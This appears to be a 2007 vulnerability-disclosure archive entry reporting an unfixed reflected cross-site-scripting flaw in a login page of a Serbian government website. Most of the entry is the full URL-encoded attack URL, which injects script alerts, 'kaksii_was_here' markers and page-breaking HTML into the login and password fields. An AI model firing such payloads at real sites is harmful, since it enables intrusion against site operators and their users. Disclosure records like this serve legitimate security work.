Security researcher kaksii, has submitted on 31/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.rgz.sr.gov.yu, which at the time of submission ranked 4943 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 31/10/2007 |
Date published: 04/11/2007 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: kaksii |
Domain: www.rgz.sr.gov.yu |
Category: XSS |
Pagerank: 4943 |
|---|
URL: http://www.rgz.sr.gov.yu/docf/Default.asp?login=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ft
extarea%3E%3Cscript%3Ealert%28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3
Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3C
div%2520align%3Dcenter%3E%2520%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520
rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscri
pt%3E%3Cplaintext%3E%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%
28%22kaksii_was_here%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E
%22%3C%2Fhtml%3E%3Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%25
20%3Cfont%2520size%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Eka
ksii%2520was%2520here%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&passwor
d=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22kaksii_was_he
re%22%29%3Cscript%3Ealert%28%27kaksii_was_here%27%29%3Balert%281%29%3C%2Fscript%3E%22%3C%2Fhtml%3E%3
Chtml%3E%3Cscript%3Ealert%2810111%29%3C%2Fscript%3E%3Cdiv%2520align%3Dcenter%3E%2520%3Cfont%2520size
%3D4%3E%3Ctextarea%2520name%3D1%2520cols%3D100000%2520rows%3D10000%2520id%3D1%3Ekaksii%2520was%2520h
ere%3C%2Ftextarea%3E%3C%2Ffont%3E%3C%2Fdiv%3E%3Cnoscript%3E%3Cplaintext%3E&btLogin=Login |
|
Click here to view the mirror
|
|
|
| 
